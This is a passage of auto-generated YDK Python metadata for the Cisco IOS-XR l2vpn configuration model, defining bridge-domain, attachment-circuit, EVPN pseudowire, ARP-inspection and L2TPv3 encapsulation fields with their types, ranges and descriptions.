_MetaInfoClassMember('interface-mac-secure', REFERENCE_CLASS, 'InterfaceMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
[], [],
''' MAC Secure
''',
'interface_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bdac-storm-control-types', REFERENCE_CLASS, 'BdacStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
[], [],
''' Storm Control
''',
'bdac_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai', REFERENCE_CLASS, 'InterfaceDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
[], [],
''' L2 Interface Dynamic ARP Inspection
''',
'interface_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Flooding
''',
'interface_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Unknown Unicast
Flooding
''',
'interface_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'interface_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-ip-source-guard', REFERENCE_CLASS, 'InterfaceIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
[], [],
''' IP Source Guard
''',
'interface_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac', REFERENCE_CLASS, 'InterfaceMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
[], [],
''' MAC configuration commands
''',
'interface_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'interface_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-profile', REFERENCE_CLASS, 'InterfaceProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
[], [],
''' Attach a DHCP profile
''',
'interface_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('split-horizon', REFERENCE_CLASS, 'SplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
[], [],
''' Split Horizon
''',
'split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-mac-addresses', REFERENCE_CLASS, 'StaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
False,
[
_MetaInfoClassMember('bd-attachment-circuit', REFERENCE_LIST, 'BdAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
[], [],
''' Name of the Attachment Circuit
''',
'bd_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
False,
[
_MetaInfoClassMember('bd-pseudowire-evpn', REFERENCE_LIST, 'BdPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
[], [],
''' EVPN Pseudowire configuration
''',
'bd_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
False,
[
_MetaInfoClassMember('dai-address-validation', REFERENCE_CLASS, 'DaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
[], [],
''' Address Validation
''',
'dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Dynamic ARP Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Routed Interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
False,
[
_MetaInfoClassMember('routed-interface', REFERENCE_LIST, 'RoutedInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
[], [],
''' Bridge Domain Routed Interface
''',
'routed_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Name of the bridge domain
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-attachment-circuits', REFERENCE_CLASS, 'BdAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
[], [],
''' Attachment Circuit table
''',
'bd_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowire-evpns', REFERENCE_CLASS, 'BdPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
[], [],
''' List of EVPN pseudowires
''',
'bd_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowires', REFERENCE_CLASS, 'BdPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
[], [],
''' List of pseudowires
''',
'bd_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-storm-controls', REFERENCE_CLASS, 'BdStormControls' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
[], [],
''' Storm Control
''',
'bd_storm_controls',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-evis', REFERENCE_CLASS, 'BridgeDomainEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
[], [],
''' Bridge Domain EVI Table
''',
'bridge_domain_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mac', REFERENCE_CLASS, 'BridgeDomainMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
[], [],
''' MAC configuration commands
''',
'bridge_domain_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mtu', ATTRIBUTE, 'int' , None, None,
[('46', '65535')], [],
''' Maximum transmission unit for this Bridge
Domain
''',
'bridge_domain_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-pbb', REFERENCE_CLASS, 'BridgeDomainPbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
[], [],
''' Bridge Domain PBB
''',
'bridge_domain_pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('coupled-mode', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Coupled-mode configuration
''',
'coupled_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dai', REFERENCE_CLASS, 'Dai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
[], [],
''' Dynamic ARP Inspection
''',
'dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dhcp', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' DHCPv4 Snooping profile name
''',
'dhcp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable flooding
''',
'flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding-unknown-unicast', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Unknown Unicast flooding
''',
'flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach IGMP Snooping Profile Name
''',
'igmp_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable IGMP Snooping
''',
'igmp_snooping_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ip-source-guard', REFERENCE_CLASS, 'IpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
[], [],
''' IP Source Guard
''',
'ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('member-vnis', REFERENCE_CLASS, 'MemberVnis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
[], [],
''' Bridge Domain VxLAN Network Identifier
Table
''',
'member_vnis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mld-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach MLD Snooping Profile Name
''',
'mld_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nv-satellite', REFERENCE_CLASS, 'NvSatellite' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
[], [],
''' nV Satellite
''',
'nv_satellite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('routed-interfaces', REFERENCE_CLASS, 'RoutedInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
[], [],
''' Bridge Domain Routed Interface Table
''',
'routed_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown the Bridge Domain
''',
'shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'BridgeDomainTransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BridgeDomainTransportModeEnum',
[], [],
''' Bridge Domain Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfis', REFERENCE_CLASS, 'Vfis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
[], [],
''' Specify the virtual forwarding interface
name
''',
'vfis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
False,
[
_MetaInfoClassMember('bridge-domain', REFERENCE_LIST, 'BridgeDomain' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
[], [],
''' bridge domain
''',
'bridge_domain',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domains',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Bridge group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domains', REFERENCE_CLASS, 'BridgeDomains' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
[], [],
''' List of Bridge Domain
''',
'bridge_domains',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups',
False,
[
_MetaInfoClassMember('bridge-domain-group', REFERENCE_LIST, 'BridgeDomainGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
[], [],
''' Bridge group
''',
'bridge_domain_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'L2Tpv3SequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Tpv3SequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
False,
[
_MetaInfoClassMember('type-of-service-mode', REFERENCE_ENUM_CLASS, 'TypeOfServiceModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TypeOfServiceModeEnum',
[], [],
''' Type of service mode
''',
'type_of_service_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service-value', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Type of service value
''',
'type_of_service_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'type-of-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
False,
[
_MetaInfoClassMember('l2tpv3-class-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the L2TPv3 class name
''',
'l2tpv3_class_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('protocol', REFERENCE_ENUM_CLASS, 'L2TpSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpSignalingProtocolEnum',
[], [],
''' L2TPv3 signaling protocol
''',
'protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable path MTU
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('max-path-mtu', ATTRIBUTE, 'int' , None, None,
[('68', '65535')], [],
''' Maximum path maximum transmission unit
''',
'max_path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'path-mtu',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
False,
[
_MetaInfoClassMember('cookie-size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Cookie size
''',
'cookie_size',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('df-bit-set', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set the do not fragment bit to 1
''',
'df_bit_set',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2TPv3 encapsulation
